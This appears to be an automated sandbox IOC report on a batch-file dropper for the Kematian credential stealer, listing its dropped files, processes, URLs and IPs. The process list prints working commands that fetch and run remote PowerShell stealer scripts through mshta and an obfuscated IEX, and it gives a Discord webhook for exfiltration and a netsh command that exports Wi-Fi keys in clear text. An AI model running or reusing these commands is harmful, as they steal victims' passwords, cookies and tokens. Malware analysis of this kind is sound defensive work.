IOC Report
thegreatestexecutor.bat

loading gif

Files

File Path
Type
Category
Malicious
thegreatestexecutor.bat
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (717), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xcfae260a, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D_US_user-PC_2024-07-03_UTC-5.zip
Zip archive data, at least v2.0 to extract, compression method=store
modified
C:\Users\user\AppData\Local\Temp\RESA945.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jul 3 18:33:18 2024, 1st section name ".debug$S"
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20kjb1pw.nyx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2itzvt3e.wy2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dxleh4z.wuq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3svzlauz.o0z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rclnls5.qkf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avdfp12q.xmg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxloozaa.nn3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0gitxd4.tuc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvccjps1.4d0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlk5d2h2.kbq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcs3himz.ui1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jial2c1p.2oj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mu30yupw.omr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc2cd2ry.35t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxljezbk.cwb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgxticly.o5k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjsl32ny.bzb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5gxzn2x.vwl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\autofill.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.out
Unicode text, UTF-8 (with BOM) text, with very long lines (803), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\cards.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\discord.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\downloads.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\history.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\passwords.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Chrome.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Edge.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Firefox.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\System.txt
Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\productkey.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\screenshot.png (copy)
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\Desktop\kdotLffirs.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotqxeWQd.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotsmFuj.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotzASik.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
malicious
C:\Windows\System32\rundll32.exe
rundll32
malicious
C:\Windows\System32\mshta.exe
mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
malicious
C:\Windows\System32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat"
C:\Windows\System32\net.exe
net session
C:\Windows\System32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
There are 13 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
185.199.109.133
malicious
https://github.com
unknown
malicious
https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw
unknown
malicious
https://raw.githubusercontent.com/ChildrenOfYa
unknown
malicious
https://raw.githubusercontent.com
unknown
malicious
https://raw.git
unknown
malicious
https://github.com/Somali-Devs/Kematian-Stealer
unknown
malicious
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
140.82.121.3
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
unknown
https://www.cloudflare.com/cdn-cgi/trace
104.16.123.96
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
unknown
https://go.micro
unknown
http://ip-api.com/json
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
http://www.microsoft.
unknown
https://www.cloudflare.com
unknown
https://raw.githubusercontent.com/C$&m
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
140.82.121.3
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
140.82.121.3
http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0
unknown
http://github.com
unknown
https://github.com/TheWover
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
185.199.109.133
http://ip-api.com
unknown
http://raw.githubusercontent.com
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
185.199.109.133
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
github.com
140.82.121.3
malicious
raw.githubusercontent.com
185.199.109.133
malicious
ip-api.com
208.95.112.1
malicious
www.cloudflare.com
104.16.123.96
objects.githubusercontent.com
185.199.110.133

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
185.199.109.133
raw.githubusercontent.com
Netherlands
malicious
140.82.121.3
github.com
United States
malicious
185.199.110.133
objects.githubusercontent.com
Netherlands
127.0.0.1
unknown
unknown
104.16.123.96
www.cloudflare.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2B3CFD0D000
trusted library allocation
page read and write
2B3D825A000
heap
page read and write
AD6D37E000
unkown
page readonly
23F4B913000
heap
page read and write
20A57467000
trusted library allocation
page read and write
21E68C1B000
heap
page read and write
BB8EC7E000
stack
page read and write
C0003DE000
direct allocation
page read and write
21E68B4A000
heap
page read and write
706843E000
stack
page read and write
2A801EF0000
heap
page read and write
236B5430000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
2A801E50000
heap
page read and write
7FFAAC7F0000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
260870E000
stack
page read and write
706813A000
stack
page read and write
2607C3E000
stack
page read and write
236B1400000
heap
page read and write
21E68BF1000
heap
page read and write
21E68C1B000
heap
page read and write
2B3D827C000
heap
page read and write
21E68B04000
heap
page read and write
7DF453CB0000
trusted library allocation
page execute and read and write
1DF1C260000
direct allocation
page read and write
21E68BF1000
heap
page read and write
21E68BF5000
heap
page read and write
21E68451000
heap
page read and write
26086C3000
stack
page read and write
216661A8000
heap
page read and write
20A6E4F6000
heap
page read and write
7FFAAC50D000
trusted library allocation
page execute and read and write
7FFAAC9C0000
trusted library allocation
page read and write
20A57F59000
trusted library allocation
page read and write
2B3D7F76000
heap
page read and write
236AFB30000
heap
page read and write
1DF13A50000
trusted library allocation
page read and write
7FFB1E3B6000
unkown
page readonly
21E68C1B000
heap
page read and write
236B5409000
trusted library allocation
page read and write
BB8FB4E000
stack
page read and write
236B1AD0000
trusted library allocation
page read and write
21E68B5E000
heap
page read and write
23F50610000
trusted library allocation
page read and write
21E68BF5000
heap
page read and write
21E68B30000
heap
page read and write
21E68A9B000
heap
page read and write
1DF1DA09000
unclassified section
page read and write
236B1783000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
7FFAAC5A1000
trusted library allocation
page read and write
236B3B47000
trusted library allocation
page read and write
AD6B177000
stack
page read and write
20A54040000
heap
page read and write
21E68B30000
heap
page read and write
20A57BCC000
trusted library allocation
page read and write
7FFAAC920000
trusted library allocation
page read and write
21666164000
heap
page read and write
236AFBFE000
heap
page read and write
70683BB000
stack
page read and write
21E68B4A000
heap
page read and write
21E68BF8000
heap
page read and write
23F4AEE0000
heap
page read and write
7FFAAC630000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
21E6899A000
heap
page read and write
2B3C127F000
trusted library allocation
page read and write
2EE29F20000
direct allocation
page read and write
2EE28597000
heap
page read and write
20A54304000
heap
page read and write
21E68455000
heap
page read and write
2B9427F000
stack
page read and write
20A569FF000
trusted library allocation
page read and write
23F4B08F000
heap
page read and write
7FFAAC780000
trusted library allocation
page read and write
2B3D82A1000
heap
page read and write
2EE29F63000
direct allocation
page read and write
2EE2859E000
heap
page read and write
2B3C1068000
trusted library allocation
page read and write
AD6CC7B000
stack
page read and write
1DF01C73000
heap
page read and write
2B3D7A53000
trusted library allocation
page read and write
2EE2C070000
direct allocation
page read and write
23F4C0E0000
trusted library section
page readonly
2EE285A9000
heap
page read and write
21E68A46000
heap
page read and write
1DF1DA95000
unclassified section
page read and write
236B15A3000
heap
page read and write
2B3C1028000
trusted library allocation
page read and write
23F51000000
heap
page read and write
1DF1BE20000
heap
page read and write
2EE2C03E000
direct allocation
page read and write
21E6893F000
heap
page read and write
21E68B30000
heap
page read and write
6FB81FF000
stack
page read and write
1DF01C60000
heap
page read and write
C00004D000
direct allocation
page read and write
236B1AD4000
trusted library allocation
page read and write
21E68434000
heap
page read and write
2EE28583000
heap
page read and write
21E6843C000
heap
page read and write
2EE28609000
heap
page read and write
21E68451000
heap
page read and write
2B3D8570000
heap
page read and write
20A572FA000
trusted library allocation
page read and write
BB8EE7B000
stack
page read and write
21E68A83000
heap
page read and write
21E68B4A000
heap
page read and write
C0003E8000
direct allocation
page read and write
21E68C00000
heap
page read and write
21E68BF1000
heap
page read and write
AD6B97B000
stack
page read and write
2EE2858D000
heap
page read and write
1DF14E69000
trusted library allocation
page read and write
21E68C00000
heap
page read and write
236B1470000
heap
page readonly
2166615B000
heap
page read and write
2EE28562000
heap
page read and write
21E68BEE000
heap
page read and write
7FFAAC3E3000
trusted library allocation
page execute and read and write
21E68B62000
heap
page read and write
BB8FACE000
stack
page read and write
260884E000
stack
page read and write
236B1780000
trusted library allocation
page read and write
23F4B91A000
heap
page read and write
236B4042000
trusted library allocation
page read and write
7FFAAC5E0000
trusted library allocation
page execute and read and write
21E68C1B000
heap
page read and write
2B3CFA30000
trusted library allocation
page read and write
21E68A41000
heap
page read and write
21E68A29000
heap
page read and write
7FFAAC720000
trusted library allocation
page read and write
1DF03710000
trusted library allocation
page read and write
7FFAAC3F0000
trusted library allocation
page read and write
21E68AD8000
heap
page read and write
21E689B1000
heap
page read and write
C000006000
direct allocation
page read and write
236B1570000
heap
page read and write
2EE28589000
heap
page read and write
21E68444000
heap
page read and write
BB8EAFE000
stack
page read and write
21E68BF1000
heap
page read and write
21E68AA5000
heap
page read and write
21E68443000
heap
page read and write
20A6E20D000
heap
page read and write
7FFAAC7C0000
trusted library allocation
page read and write
21E68244000
heap
page read and write
21E6AC56000
heap
page read and write
21E68C00000
heap
page read and write
236AFAF0000
heap
page read and write
2EE2BE70000
direct allocation
page read and write
21E68AF8000
heap
page read and write
2B3C1082000
trusted library allocation
page read and write
7FFAAC770000
trusted library allocation
page read and write
1DF1C048000
heap
page read and write
21E68C00000
heap
page read and write
1C8285C4000
heap
page read and write
236B41BA000
trusted library allocation
page read and write
21E68B06000
heap
page read and write
2EE2859E000
heap
page read and write
1DF036A0000
trusted library allocation
page read and write
21E68BF1000
heap
page read and write
7FFAAC6F0000
trusted library allocation
page execute and read and write
2EE28596000
heap
page read and write
2EE28604000
heap
page read and write
FD7834E000
stack
page read and write
21E68BF8000
heap
page read and write
216661E6000
heap
page read and write
7068D8E000
stack
page read and write
7FFAAC620000
trusted library allocation
page execute and read and write
7FFB1E3A0000
unkown
page readonly
20A6E3A9000
heap
page read and write
7FFAAC620000
trusted library allocation
page read and write
236B5319000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
21E68AF8000
heap
page read and write
23F50800000
trusted library allocation
page read and write
21E68448000
heap
page read and write
7FFAAC496000
trusted library allocation
page read and write
C0000FC000
direct allocation
page read and write
21666176000
heap
page read and write
21E68BF1000
heap
page read and write
23F4B07D000
heap
page read and write
21E68C00000
heap
page read and write
2B3BE125000
heap
page read and write
7FFB16790000
unkown
page readonly
21E68C00000
heap
page read and write
BB8EDF7000
stack
page read and write
236B3B55000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
21E68A4F000
heap
page read and write
20A6E1F7000
heap
page read and write
21E6CE20000
trusted library allocation
page read and write
23F50590000
trusted library allocation
page read and write
216661A0000
heap
page read and write
21E68BA4000
heap
page read and write
21E689C7000
heap
page read and write
2C388D40000
heap
page read and write
1DF1D6FD000
unclassified section
page read and write
21E68C05000
heap
page read and write
20A6E350000
heap
page read and write
21E68C0A000
heap
page read and write
C000280000
direct allocation
page read and write
BB8ECFE000
stack
page read and write
2EE285DF000
heap
page read and write
21E6899C000
heap
page read and write
C00043F000
direct allocation
page read and write
21E6843C000
heap
page read and write
2EE28592000
heap
page read and write
4113FFD000
stack
page read and write
1A3B3DB4000
heap
page read and write
7FFAAC640000
trusted library allocation
page read and write
1DF1C21C000
direct allocation
page read and write
7FFAAC502000
trusted library allocation
page read and write
236B1825000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
2B3BE270000
heap
page read and write
2B3D8232000
heap
page read and write
21E6CA22000
trusted library allocation
page read and write
2EE29F7B000
direct allocation
page read and write
4114F8E000
stack
page read and write
2A801EF8000
heap
page read and write
21E68A09000
heap
page read and write
F7FA7FE000
stack
page read and write
1DF03DE6000
trusted library allocation
page read and write
21E68B30000
heap
page read and write
2EE28500000
heap
page read and write
236B4611000
trusted library allocation
page read and write
2B3C1639000
trusted library allocation
page read and write
C000212000
direct allocation
page read and write
7FFAAC790000
trusted library allocation
page read and write
236B195A000
trusted library allocation
page read and write
70680BB000
stack
page read and write
2EE2BEF0000
direct allocation
page read and write
21E68B30000
heap
page read and write
2EE2C03E000
direct allocation
page read and write
23F4B078000
heap
page read and write
2EE2856A000
heap
page read and write
4114078000
stack
page read and write
AD6BDFE000
stack
page read and write
21E68BF1000
heap
page read and write
216661A9000
heap
page read and write
236AFB7A000
heap
page read and write
236B463E000
trusted library allocation
page read and write
21E68BF5000
heap
page read and write
C00003F000
direct allocation
page read and write
7067CFE000
stack
page read and write
BB8EBFE000
stack
page read and write
21E68B53000
heap
page read and write
2EE2C0D0000
direct allocation
page read and write
70682BC000
stack
page read and write
236B466F000
trusted library allocation
page read and write
C00007A000
direct allocation
page read and write
23F50655000
heap
page read and write
2B3D80F0000
heap
page read and write
216660D0000
heap
page read and write
2B3C0651000
trusted library allocation
page read and write
2B3D7F99000
heap
page read and write
20A55F99000
heap
page read and write
1DF01E74000
heap
page read and write
21E68BF5000
heap
page read and write
20A569DE000
trusted library allocation
page read and write
216661ED000
heap
page read and write
21667B00000
heap
page read and write
21666173000
heap
page read and write
2B3C163D000
trusted library allocation
page read and write
7FFAAC6C0000
trusted library allocation
page read and write
2B3BE274000
heap
page read and write
C000023000
direct allocation
page read and write
20A54108000
heap
page read and write
2B3BE123000
heap
page read and write
C00012A000
direct allocation
page read and write
411520C000
stack
page read and write
236AFA10000
heap
page read and write
236B462A000
trusted library allocation
page read and write
2B3D80C0000
heap
page execute and read and write
21667B40000
heap
page read and write
7067F79000
stack
page read and write
21E68B44000
heap
page read and write
7FFAAC760000
trusted library allocation
page read and write
2607373000
stack
page read and write
20A6E250000
heap
page read and write
2608DCF000
stack
page read and write
2EE2BF50000
direct allocation
page read and write
21E68BF5000
heap
page read and write
236B3B63000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
1A3B3EC0000
heap
page read and write
23F50600000
heap
page read and write
2EE28540000
heap
page read and write
7FFAAC6BA000
trusted library allocation
page read and write
21E68AD8000
heap
page read and write
23F5062C000
heap
page read and write
21E68A46000
heap
page read and write
1DF1C019000
heap
page read and write
2B3BE276000
heap
page read and write
21E68BF5000
heap
page read and write
21E68A21000
heap
page read and write
21667AD0000
trusted library allocation
page read and write
216661B7000
heap
page read and write
7067DFF000
stack
page read and write
21E68B72000
heap
page read and write
21E6AC45000
heap
page read and write
21E68B4A000
heap
page read and write
236B40D0000
trusted library allocation
page read and write
21E68B4A000
heap
page read and write
2607A36000
stack
page read and write
23F50504000
trusted library allocation
page read and write
411500B000
stack
page read and write
21E68A51000
heap
page read and write
2B3D7F78000
heap
page read and write
2EE28612000
heap
page read and write
BB8EFFE000
stack
page read and write
2B3BE020000
heap
page read and write
1A3B3D80000
heap
page read and write
C000028000
direct allocation
page read and write
2EE2859E000
heap
page read and write
216661E4000
heap
page read and write
21E6CE25000
trusted library allocation
page read and write
3277CFF000
stack
page read and write
7FFAAC4D6000
trusted library allocation
page execute and read and write
1DF04677000
trusted library allocation
page read and write
20A580F6000
trusted library allocation
page read and write
21E68C1B000
heap
page read and write
7FFAAC740000
trusted library allocation
page read and write
23F506EA000
heap
page read and write
21E68C00000
heap
page read and write
BB8EB7C000
stack
page read and write
21E68A60000
heap
page read and write
21E68B53000
heap
page read and write
1DF1D6BF000
unclassified section
page read and write
2B3CFD19000
trusted library allocation
page read and write
21E68424000
heap
page read and write
20A55AB0000
trusted library allocation
page read and write
20A54290000
trusted library allocation
page read and write
20A66151000
trusted library allocation
page read and write
20A57780000
trusted library allocation
page read and write
7FFAAC670000
trusted library allocation
page read and write
2166620E000
heap
page read and write
21E68A46000
heap
page read and write
1DF01CAC000
heap
page read and write
2608CCE000
stack
page read and write
2EE28619000
heap
page read and write
20A570A9000
trusted library allocation
page read and write
21E68996000
heap
page read and write
20A54092000
heap
page read and write
1DF1C1F0000
direct allocation
page read and write
21E6845E000
heap
page read and write
C000018000
direct allocation
page read and write
21E67EA7000
heap
page read and write
21E68B68000
heap
page read and write
7067EFD000
stack
page read and write
AD6C0FE000
stack
page read and write
23F505F0000
trusted library allocation
page read and write
AD6B37E000
stack
page read and write
C00022C000
direct allocation
page read and write
2EE28580000
heap
page read and write
236B4039000
trusted library allocation
page read and write
23F506F4000
heap
page read and write
6FB7CFD000
unkown
page read and write
C000068000
direct allocation
page read and write
236B5013000
trusted library allocation
page read and write
236B3B6B000
trusted library allocation
page read and write
20A57FE2000
trusted library allocation
page read and write
C00004F000
direct allocation
page read and write
2B93F2F000
stack
page read and write
7FFAAC5B0000
trusted library allocation
page execute and read and write
1C828450000
heap
page read and write
AD6B87E000
unkown
page readonly
1DF1D6F1000
unclassified section
page read and write
21E6AC56000
heap
page read and write
236B41CE000
trusted library allocation
page read and write
1DF03DA7000
trusted library allocation
page read and write
BB8F07E000
stack
page read and write
7FFAAC720000
trusted library allocation
page read and write
1DF1C198000
direct allocation
page read and write
4113F79000
stack
page read and write
7FFAAC820000
trusted library allocation
page read and write
21E68C1B000
heap
page read and write
1DF01C62000
heap
page read and write
21E68BF8000
heap
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
C00013C000
direct allocation
page read and write
20A66171000
trusted library allocation
page read and write
21E6899A000
heap
page read and write
7FFAAC591000
trusted library allocation
page read and write
411530B000
stack
page read and write
2B3BE0E3000
heap
page read and write
7FFAAC660000
trusted library allocation
page read and write
1DF03DB9000
trusted library allocation
page read and write
21E6843C000
heap
page read and write
C000014000
direct allocation
page read and write
20A5738F000
trusted library allocation
page read and write
2B3D81F8000
heap
page read and write
2EE2857E000
heap
